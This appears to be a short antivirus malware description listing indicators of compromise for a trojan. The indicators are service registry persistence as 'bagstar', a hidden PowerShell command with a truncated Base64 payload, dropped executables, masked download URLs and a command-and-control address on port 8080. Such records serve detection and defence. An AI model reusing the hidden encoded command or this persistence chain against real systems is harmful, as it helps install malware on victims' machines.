Technical Information
- [<HKLM>\System\CurrentControlSet\Services\bagstar] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\bagstar] 'ImagePath' = '"%WINDIR%\SysWOW64\bagstar.exe"'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle hidden -enco JABCAGgAbAByAHQAdQBxAGoAcAB5AD0AJwBJAGEAcgBqAHoAZwBhAHAAeABpAHQAaABwACcAOwAkAEsAYwBxAG4AegBwAGMAbABnAGUAIAA9ACAAJwAyADUAMQAnADsAJABYAGQAdgBnAHAAZABmAHoAdwBlAGQAPQAnAFI...
- %HOMEPATH%\251.exe
- from %HOMEPATH%\251.exe to %WINDIR%\syswow64\bagstar.exe
- http://su#####lsupplies.com/wp-content/63689260/
- http://17#.##0.31.177:8080/chunk/entries/ringin/ via 17#.#30.31.177
- DNS ASK su#####lsupplies.com
- '%HOMEPATH%\251.exe'
- '%WINDIR%\syswow64\bagstar.exe'